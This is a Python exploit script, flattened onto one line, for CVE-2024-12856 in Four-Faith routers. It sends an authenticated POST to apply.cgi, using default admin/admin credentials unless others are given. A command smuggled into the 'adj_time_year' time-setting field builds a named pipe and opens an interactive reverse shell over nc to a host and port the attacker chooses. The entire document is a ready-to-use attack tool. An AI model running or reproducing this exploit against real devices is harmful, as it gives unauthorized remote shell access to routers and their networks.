import requests from requests.auth import HTTPBasicAuth import argparse def make_request(ip, lhost, lport, user, password, rport): url = "http://{IP}:{PORT}/apply.cgi".format(IP = ip, PORT = rport) data = { "adj_time_sec": "32", "change_action": "gozila_cgi", "adj_time_day": "27", "adj_time_mon": "10", "adj_time_hour": "11", "adj_time_year": "$(cd /tmp/; mknod bOY p;cat bOY|/bin/sh -i 2>&1|nc {IP} {PORT} >bOY; rm bOY;)".format(IP=lhost, PORT = lport), "adj_time_min": "35", "submit_button": "index", "action": "Save", "submit_type": "adjust_sys_time", } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36", # feel free to change it "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip", } auth = HTTPBasicAuth(user, password) try: requests.post(url, headers=headers, data=data, auth=auth) except Exception as e: print(e) print("Wrong credentials") def main(): parser = argparse.ArgumentParser(description="Exploit for CVE-2024-12856 to get a reverse shell to Four-Faith routers") # Mandatory arguments parser.add_argument("RHOST", help="The remote IP address. Also accepts domains") parser.add_argument("LHOST", help="The local IP for reverse shell") parser.add_argument("LPORT", help="The local port") # Optional arguments parser.add_argument("-u", "--username", default="admin", help="Username for authentication (default: admin)") parser.add_argument("-p", "--password", default="admin", help="Password for authentication (default: admin)") parser.add_argument("-rport", "--remote_port", default=80, help="Remote port (default: 80)") args = parser.parse_args() ip = args.RHOST lhost = args.LHOST lport = args.LPORT user = args.username password = args.password rport = args.remote_port make_request(ip, lhost, lport, user, password, rport) if __name__ == "__main__": main()